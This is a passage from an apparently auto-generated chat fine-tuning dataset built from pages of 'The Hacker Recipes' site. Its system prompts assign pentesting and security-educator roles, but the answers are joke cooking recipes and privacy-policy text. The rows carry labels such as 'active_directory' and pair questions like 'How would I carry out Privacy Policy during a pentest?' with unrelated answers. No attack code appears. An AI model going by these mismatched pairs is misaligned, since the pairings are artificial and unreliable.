du seigneur\": 200g steaks made out of a kneaded mixture (meat, ketchup, minced red onion, cayenne pepper, provencal herbs)\n\nThe steaks can be cooked in a pan along with the lard. 2 slices of cheddar should be added right before the end of the cooking."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🍔 Burger du seigneur - The steak?", "response": "The steak can be created with one of two methods:\n\n* Classic: 200g steaks made out of mince meat\n* \"Steak du seigneur\": 200g steaks made out of a kneaded mixture (meat, ketchup, minced red onion, cayenne pepper, provencal herbs)\n\nThe steaks can be cooked in a pan along with the lard. 2 slices of cheddar should be added right before the end of the cooking.", "metadata": {"corpus_index": 1627, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🍔 Burger du seigneur - Ingredients, assemble!"}, {"role": "assistant", "content": "The various preparations can be assembled. \n\n* Burger: bottom bun, a little bit of sauce, a tomato slice, the steak, the lard and the top bun.\n* Fries: the fries, cheddar on top, and slices bacon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🍔 Burger du seigneur - Ingredients, assemble!", "response": "The various preparations can be assembled. \n\n* Burger: bottom bun, a little bit of sauce, a tomato slice, the steak, the lard and the top bun.\n* Fries: the fries, cheddar on top, and slices bacon", "metadata": {"corpus_index": 1628, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🍔 Burger du seigneur - Ingredients, assemble!"}, {"role": "assistant", "content": "The various preparations can be assembled. \n\n* Burger: bottom bun, a little bit of sauce, a tomato slice, the steak, the lard and the top bun.\n* Fries: the fries, cheddar on top, and slices bacon"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🍔 Burger du seigneur - Ingredients, assemble!", "response": "The various preparations can be assembled. \n\n* Burger: bottom bun, a little bit of sauce, a tomato slice, the steak, the lard and the top bun.\n* Fries: the fries, cheddar on top, and slices bacon", "metadata": {"corpus_index": 1628, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🍳 Omelette du fromage - Theory?"}, {"role": "assistant", "content": "The French dish \"Omelette du fromage\" is famously known for its ability to convey strength and resistance to its eaters. Its preparation and consumption is common for fast-paced attackers in need of daily nutrients.\n\nThe requirements for this omelette are as follow (for 1 attacker):\n\n* 2 to 3 eggs :egg:\n* grated cheese :cheese: (the type of cheese is to be set depending on the attacker's mood and local resources)\n* butter\n* option: parsley can be added for improved taste :herb:\n\nA salad bowl, a spatula, a frying pan and a fourchette will be needed to conduct this technique.\n\n> [!SUCCESS]\n> During pentesting engagements, cooking and eating an Omelette du fromage will help _HACK_ with ease! :pirate_flag:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🍳 Omelette du fromage - Theory?", "response": "The French dish \"Omelette du fromage\" is famously known for its ability to convey strength and resistance to its eaters. Its preparation and consumption is common for fast-paced attackers in need of daily nutrients.\n\nThe requirements for this omelette are as follow (for 1 attacker):\n\n* 2 to 3 eggs :egg:\n* grated cheese :cheese: (the type of cheese is to be set depending on the attacker's mood and local resources)\n* butter\n* option: parsley can be added for improved taste :herb:\n\nA salad bowl, a spatula, a frying pan and a fourchette will be needed to conduct this technique.\n\n> [!SUCCESS]\n> During pentesting engagements, cooking and eating an Omelette du fromage will help _HACK_ with ease! :pirate_flag:", "metadata": {"corpus_index": 1629, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/omelette-du-fromage.md", "page_title": "🍳 Omelette du fromage", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🍳 Omelette du fromage - Theory?"}, {"role": "assistant", "content": "The French dish \"Omelette du fromage\" is famously known for its ability to convey strength and resistance to its eaters. Its preparation and consumption is common for fast-paced attackers in need of daily nutrients.\n\nThe requirements for this omelette are as follow (for 1 attacker):\n\n* 2 to 3 eggs :egg:\n* grated cheese :cheese: (the type of cheese is to be set depending on the attacker's mood and local resources)\n* butter\n* option: parsley can be added for improved taste :herb:\n\nA salad bowl, a spatula, a frying pan and a fourchette will be needed to conduct this technique.\n\n> [!SUCCESS]\n> During pentesting engagements, cooking and eating an Omelette du fromage will help _HACK_ with ease! :pirate_flag:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🍳 Omelette du fromage - Theory?", "response": "The French dish \"Omelette du fromage\" is famously known for its ability to convey strength and resistance to its eaters. Its preparation and consumption is common for fast-paced attackers in need of daily nutrients.\n\nThe requirements for this omelette are as follow (for 1 attacker):\n\n* 2 to 3 eggs :egg:\n* grated cheese :cheese: (the type of cheese is to be set depending on the attacker's mood and local resources)\n* butter\n* option: parsley can be added for improved taste :herb:\n\nA salad bowl, a spatula, a frying pan and a fourchette will be needed to conduct this technique.\n\n> [!SUCCESS]\n> During pentesting engagements, cooking and eating an Omelette du fromage will help _HACK_ with ease! :pirate_flag:", "metadata": {"corpus_index": 1629, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/omelette-du-fromage.md", "page_title": "🍳 Omelette du fromage", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🍳 Omelette du fromage - Practice work?"}, {"role": "assistant", "content": "The technique can be operated as follows:\n\n1. The eggs (2-3) must be broken and \"poured\" into a salad bowl\n2. Grated cheese can be added (unlimited amount)\n3. Season and salt are then needed for tasting purposes\n4. Mixing the whole content with a spatula will allow to obtain a real omelette\n5. The mixed content from the salad bowl onto the frying pan shall then be operated\n6. Once cooked, closing the omelette will improve presentation but is a risky process and might require experimented attackers to take the lead on this step\n7. Adding parsley is optionnal but can greatly improve taste\n8. Savoring the Omelette du fromage is then possible.\n\nThis technique can be combined with the banana & chocolate cake one for a whole meal."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🍳 Omelette du fromage - Practice work?", "response": "The technique can be operated as follows:\n\n1. The eggs (2-3) must be broken and \"poured\" into a salad bowl\n2. Grated cheese can be added (unlimited amount)\n3. Season and salt are then needed for tasting purposes\n4. Mixing the whole content with a spatula will allow to obtain a real omelette\n5. The mixed content from the salad bowl onto the frying pan shall then be operated\n6. Once cooked, closing the omelette will improve presentation but is a risky process and might require experimented attackers to take the lead on this step\n7. Adding parsley is optionnal but can greatly improve taste\n8. Savoring the Omelette du fromage is then possible.\n\nThis technique can be combined with the banana & chocolate cake one for a whole meal.", "metadata": {"corpus_index": 1630, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/omelette-du-fromage.md", "page_title": "🍳 Omelette du fromage", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🍳 Omelette du fromage - Practice"}, {"role": "assistant", "content": "The technique can be operated as follows:\n\n1. The eggs (2-3) must be broken and \"poured\" into a salad bowl\n2. Grated cheese can be added (unlimited amount)\n3. Season and salt are then needed for tasting purposes\n4. Mixing the whole content with a spatula will allow to obtain a real omelette\n5. The mixed content from the salad bowl onto the frying pan shall then be operated\n6. Once cooked, closing the omelette will improve presentation but is a risky process and might require experimented attackers to take the lead on this step\n7. Adding parsley is optionnal but can greatly improve taste\n8. Savoring the Omelette du fromage is then possible.\n\nThis technique can be combined with the banana & chocolate cake one for a whole meal."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🍳 Omelette du fromage - Practice", "response": "The technique can be operated as follows:\n\n1. The eggs (2-3) must be broken and \"poured\" into a salad bowl\n2. Grated cheese can be added (unlimited amount)\n3. Season and salt are then needed for tasting purposes\n4. Mixing the whole content with a spatula will allow to obtain a real omelette\n5. The mixed content from the salad bowl onto the frying pan shall then be operated\n6. Once cooked, closing the omelette will improve presentation but is a risky process and might require experimented attackers to take the lead on this step\n7. Adding parsley is optionnal but can greatly improve taste\n8. Savoring the Omelette du fromage is then possible.\n\nThis technique can be combined with the banana & chocolate cake one for a whole meal.", "metadata": {"corpus_index": 1630, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/omelette-du-fromage.md", "page_title": "🍳 Omelette du fromage", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🥞 The Pancakes of Heaven - Theory"}, {"role": "assistant", "content": "Those who made it here are one of the luckiest. The legend says that hackers who ate these pancakes saw the doors of heaven wide open! :open_mouth:\n\nFollowing are the ingredients for 3 BIG PANCAKES (we wanna enter those doors, don't we? :eyes:):\n\n* 1 banana\n* 1 egg\n* 3 tablespoons of coconut Milk \n* 70g of oatmeal \n* 1 teaspoon of Açai's powder \n* 1 tablespoon of Goji barries \n* 1 tablespoon of maizena \n* 1 teaspoon of baking powder"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🥞 The Pancakes of Heaven - Theory", "response": "Those who made it here are one of the luckiest. The legend says that hackers who ate these pancakes saw the doors of heaven wide open! :open_mouth:\n\nFollowing are the ingredients for 3 BIG PANCAKES (we wanna enter those doors, don't we? :eyes:):\n\n* 1 banana\n* 1 egg\n* 3 tablespoons of coconut Milk \n* 70g of oatmeal \n* 1 teaspoon of Açai's powder \n* 1 tablespoon of Goji barries \n* 1 tablespoon of maizena \n* 1 teaspoon of baking powder", "metadata": {"corpus_index": 1631, "category": "linux", "source_file": "docs/src/physical/super-secret-zones/the-pancakes-of-heaven.md", "page_title": "🥞 The Pancakes of Heaven", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🥞 The Pancakes of Heaven - Theory"}, {"role": "assistant", "content": "Those who made it here are one of the luckiest. The legend says that hackers who ate these pancakes saw the doors of heaven wide open! :open_mouth:\n\nFollowing are the ingredients for 3 BIG PANCAKES (we wanna enter those doors, don't we? :eyes:):\n\n* 1 banana\n* 1 egg\n* 3 tablespoons of coconut Milk \n* 70g of oatmeal \n* 1 teaspoon of Açai's powder \n* 1 tablespoon of Goji barries \n* 1 tablespoon of maizena \n* 1 teaspoon of baking powder"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🥞 The Pancakes of Heaven - Theory", "response": "Those who made it here are one of the luckiest. The legend says that hackers who ate these pancakes saw the doors of heaven wide open! :open_mouth:\n\nFollowing are the ingredients for 3 BIG PANCAKES (we wanna enter those doors, don't we? :eyes:):\n\n* 1 banana\n* 1 egg\n* 3 tablespoons of coconut Milk \n* 70g of oatmeal \n* 1 teaspoon of Açai's powder \n* 1 tablespoon of Goji barries \n* 1 tablespoon of maizena \n* 1 teaspoon of baking powder", "metadata": {"corpus_index": 1631, "category": "linux", "source_file": "docs/src/physical/super-secret-zones/the-pancakes-of-heaven.md", "page_title": "🥞 The Pancakes of Heaven", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🥞 The Pancakes of Heaven - Practice"}, {"role": "assistant", "content": "1. In a container, mash the banana with the bottom of a fork\n2. Add the egg and the coconut milk and mix\n3. Add the Açai's powder, the maizena, the oatmeal and the baking powder and mix\n4. Form 3 \"perfectly-rounded\" pancakes on a very hot stove and cook for 2 minutes on each side\n\nNow, the most important part: the toppings. Plenty of options here but following are few: \n\n* Peanut butter with all sorts of nuts (nuts, almonds, cashew nuts, hazelnuts, etc.)\n* Melted dark chocolate with berries (blue berries, red berries or whatever color berries)\n* Maple syrup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🥞 The Pancakes of Heaven - Practice", "response": "1. In a container, mash the banana with the bottom of a fork\n2. Add the egg and the coconut milk and mix\n3. Add the Açai's powder, the maizena, the oatmeal and the baking powder and mix\n4. Form 3 \"perfectly-rounded\" pancakes on a very hot stove and cook for 2 minutes on each side\n\nNow, the most important part: the toppings. Plenty of options here but following are few: \n\n* Peanut butter with all sorts of nuts (nuts, almonds, cashew nuts, hazelnuts, etc.)\n* Melted dark chocolate with berries (blue berries, red berries or whatever color berries)\n* Maple syrup", "metadata": {"corpus_index": 1632, "category": "linux", "source_file": "docs/src/physical/super-secret-zones/the-pancakes-of-heaven.md", "page_title": "🥞 The Pancakes of Heaven", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🥞 The Pancakes of Heaven - Practice"}, {"role": "assistant", "content": "1. In a container, mash the banana with the bottom of a fork\n2. Add the egg and the coconut milk and mix\n3. Add the Açai's powder, the maizena, the oatmeal and the baking powder and mix\n4. Form 3 \"perfectly-rounded\" pancakes on a very hot stove and cook for 2 minutes on each side\n\nNow, the most important part: the toppings. Plenty of options here but following are few: \n\n* Peanut butter with all sorts of nuts (nuts, almonds, cashew nuts, hazelnuts, etc.)\n* Melted dark chocolate with berries (blue berries, red berries or whatever color berries)\n* Maple syrup"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🥞 The Pancakes of Heaven - Practice", "response": "1. In a container, mash the banana with the bottom of a fork\n2. Add the egg and the coconut milk and mix\n3. Add the Açai's powder, the maizena, the oatmeal and the baking powder and mix\n4. Form 3 \"perfectly-rounded\" pancakes on a very hot stove and cook for 2 minutes on each side\n\nNow, the most important part: the toppings. Plenty of options here but following are few: \n\n* Peanut butter with all sorts of nuts (nuts, almonds, cashew nuts, hazelnuts, etc.)\n* Melted dark chocolate with berries (blue berries, red berries or whatever color berries)\n* Maple syrup", "metadata": {"corpus_index": 1632, "category": "linux", "source_file": "docs/src/physical/super-secret-zones/the-pancakes-of-heaven.md", "page_title": "🥞 The Pancakes of Heaven", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does About us work?"}, {"role": "assistant", "content": "_Last updated: December 11, 2024_\n\n| Field | Details |\n|----------------------|-------------------------------------------|\n| Business name | Monkey 513 |\n| SIRET | 932 547 367 00015 |\n| Legal form | SASU |\n| Share capital | 1000€ |\n| Representative | Charlie BROMBERG |\n| Address | 122 rue Amelot, 75011 Paris |\n| Contact | contact@thehacker.recipes |\n| Hosting | CloudFlare Pages |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does About us work?", "response": "_Last updated: December 11, 2024_\n\n| Field | Details |\n|----------------------|-------------------------------------------|\n| Business name | Monkey 513 |\n| SIRET | 932 547 367 00015 |\n| Legal form | SASU |\n| Share capital | 1000€ |\n| Representative | Charlie BROMBERG |\n| Address | 122 rue Amelot, 75011 Paris |\n| Contact | contact@thehacker.recipes |\n| Hosting | CloudFlare Pages |", "metadata": {"corpus_index": 1633, "category": "web", "source_file": "docs/src/policies/about.md", "page_title": "About us", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for About us?"}, {"role": "assistant", "content": "_Last updated: December 11, 2024_\n\n| Field | Details |\n|----------------------|-------------------------------------------|\n| Business name | Monkey 513 |\n| SIRET | 932 547 367 00015 |\n| Legal form | SASU |\n| Share capital | 1000€ |\n| Representative | Charlie BROMBERG |\n| Address | 122 rue Amelot, 75011 Paris |\n| Contact | contact@thehacker.recipes |\n| Hosting | CloudFlare Pages |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for About us?", "response": "_Last updated: December 11, 2024_\n\n| Field | Details |\n|----------------------|-------------------------------------------|\n| Business name | Monkey 513 |\n| SIRET | 932 547 367 00015 |\n| Legal form | SASU |\n| Share capital | 1000€ |\n| Representative | Charlie BROMBERG |\n| Address | 122 rue Amelot, 75011 Paris |\n| Contact | contact@thehacker.recipes |\n| Hosting | CloudFlare Pages |", "metadata": {"corpus_index": 1633, "category": "web", "source_file": "docs/src/policies/about.md", "page_title": "About us", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Privacy Policy"}, {"role": "assistant", "content": "_Last updated: December 11, 2024_\n\nThis Privacy Policy describes Our policies and procedures on the collection, use, and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.\n\nWe use Your Personal Data to provide and improve the Service. By using the Service, You agree to the collection and use of information in accordance with this Privacy Policy."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Privacy Policy", "response": "_Last updated: December 11, 2024_\n\nThis Privacy Policy describes Our policies and procedures on the collection, use, and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.\n\nWe use Your Personal Data to provide and improve the Service. By using the Service, You agree to the collection and use of information in accordance with this Privacy Policy.", "metadata": {"corpus_index": 1634, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Privacy Policy during a pentest?"}, {"role": "assistant", "content": "_Last updated: December 11, 2024_\n\nThis Privacy Policy describes Our policies and procedures on the collection, use, and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.\n\nWe use Your Personal Data to provide and improve the Service. By using the Service, You agree to the collection and use of information in accordance with this Privacy Policy."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Privacy Policy during a pentest?", "response": "_Last updated: December 11, 2024_\n\nThis Privacy Policy describes Our policies and procedures on the collection, use, and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.\n\nWe use Your Personal Data to provide and improve the Service. By using the Service, You agree to the collection and use of information in accordance with this Privacy Policy.", "metadata": {"corpus_index": 1634, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Privacy Policy - Interpretation"}, {"role": "assistant", "content": "The words with initial letters capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or plural."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Privacy Policy - Interpretation", "response": "The words with initial letters capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or plural.", "metadata": {"corpus_index": 1635, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Privacy Policy - Interpretation"}, {"role": "assistant", "content": "The words with initial letters capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or plural."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Privacy Policy - Interpretation", "response": "The words with initial letters capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or plural.", "metadata": {"corpus_index": 1635, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Privacy Policy - Definitions?"}, {"role": "assistant", "content": "For the purposes of this Privacy Policy:\n\n- Account: A unique account created for You to access our Service or parts of our Service.\n- Company (referred to as \"the Company\", \"We\", \"Us\", or \"Our\" in this Agreement): Refers to Monkey 513, 122 rue Amelot, 75011 Paris.\n- Cookies: Small files placed on Your computer, mobile device, or any other device by a website, containing details of Your browsing history on that website among its many uses.\n- Country: Refers to France.\n- Device: Any device that can access the Service, such as a computer, cellphone, or digital tablet.\n- Personal Data: Any information that relates to an identified or identifiable individual.\n- Service: Refers to the Website.\n- Usage Data: Data collected automatically, either generated by the use of the Service or from the Service infrastructure itself (e.g., the duration of a page visit).\n- Website: Refers to The Hacker Recipes, accessible from thehacker.recipes.\n- You: The individual accessing or using the Service, or the company or other legal entity on behalf of which such an individual is accessing or using the Service."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Privacy Policy - Definitions?", "response": "For the purposes of this Privacy Policy:\n\n- Account: A unique account created for You to access our Service or parts of our Service.\n- Company (referred to as \"the Company\", \"We\", \"Us\", or \"Our\" in this Agreement): Refers to Monkey 513, 122 rue Amelot, 75011 Paris.\n- Cookies: Small files placed on Your computer, mobile device, or any other device by a website, containing details of Your browsing history on that website among its many uses.\n- Country: Refers to France.\n- Device: Any device that can access the Service, such as a computer, cellphone, or digital tablet.\n- Personal Data: Any information that relates to an identified or identifiable individual.\n- Service: Refers to the Website.\n- Usage Data: Data collected automatically, either generated by the use of the Service or from the Service infrastructure itself (e.g., the duration of a page visit).\n- Website: Refers to The Hacker Recipes, accessible from thehacker.recipes.\n- You: The individual accessing or using the Service, or the company or other legal entity on behalf of which such an individual is accessing or using the Service.", "metadata": {"corpus_index": 1636, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Privacy Policy - Definitions"}, {"role": "assistant", "content": "For the purposes of this Privacy Policy:\n\n- Account: A unique account created for You to access our Service or parts of our Service.\n- Company (referred to as \"the Company\", \"We\", \"Us\", or \"Our\" in this Agreement): Refers to Monkey 513, 122 rue Amelot, 75011 Paris.\n- Cookies: Small files placed on Your computer, mobile device, or any other device by a website, containing details of Your browsing history on that website among its many uses.\n- Country: Refers to France.\n- Device: Any device that can access the Service, such as a computer, cellphone, or digital tablet.\n- Personal Data: Any information that relates to an identified or identifiable individual.\n- Service: Refers to the Website.\n- Usage Data: Data collected automatically, either generated by the use of the Service or from the Service infrastructure itself (e.g., the duration of a page visit).\n- Website: Refers to The Hacker Recipes, accessible from thehacker.recipes.\n- You: The individual accessing or using the Service, or the company or other legal entity on behalf of which such an individual is accessing or using the Service."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Privacy Policy - Definitions", "response": "For the purposes of this Privacy Policy:\n\n- Account: A unique account created for You to access our Service or parts of our Service.\n- Company (referred to as \"the Company\", \"We\", \"Us\", or \"Our\" in this Agreement): Refers to Monkey 513, 122 rue Amelot, 75011 Paris.\n- Cookies: Small files placed on Your computer, mobile device, or any other device by a website, containing details of Your browsing history on that website among its many uses.\n- Country: Refers to France.\n- Device: Any device that can access the Service, such as a computer, cellphone, or digital tablet.\n- Personal Data: Any information that relates to an identified or identifiable individual.\n- Service: Refers to the Website.\n- Usage Data: Data collected automatically, either generated by the use of the Service or from the Service infrastructure itself (e.g., the duration of a page visit).\n- Website: Refers to The Hacker Recipes, accessible from thehacker.recipes.\n- You: The individual accessing or using the Service, or the company or other legal entity on behalf of which such an individual is accessing or using the Service.", "metadata": {"corpus_index": 1636, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Privacy Policy - Personal Data?"}, {"role": "assistant", "content": "While using the \"donation\" or \"shop\" sections of Our Service, We may ask You to provide Us with certain personally identifiable information, including but not limited to:\n\n- Email address\n- Name or Social Media Profile (only if You choose to provide it during checkout for donations)\n- Usage Data\n\nIf You provide Your name or social media profile during the donation checkout process, We may display this information publicly on the Website."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Privacy Policy - Personal Data?", "response": "While using the \"donation\" or \"shop\" sections of Our Service, We may ask You to provide Us with certain personally identifiable information, including but not limited to:\n\n- Email address\n- Name or Social Media Profile (only if You choose to provide it during checkout for donations)\n- Usage Data\n\nIf You provide Your name or social media profile during the donation checkout process, We may display this information publicly on the Website.", "metadata": {"corpus_index": 1637, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Privacy Policy - Personal Data"}, {"role": "assistant", "content": "While using the \"donation\" or \"shop\" sections of Our Service, We may ask You to provide Us with certain personally identifiable information, including but not limited to:\n\n- Email address\n- Name or Social Media Profile (only if You choose to provide it during checkout for donations)\n- Usage Data\n\nIf You provide Your name or social media profile during the donation checkout process, We may display this information publicly on the Website."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical 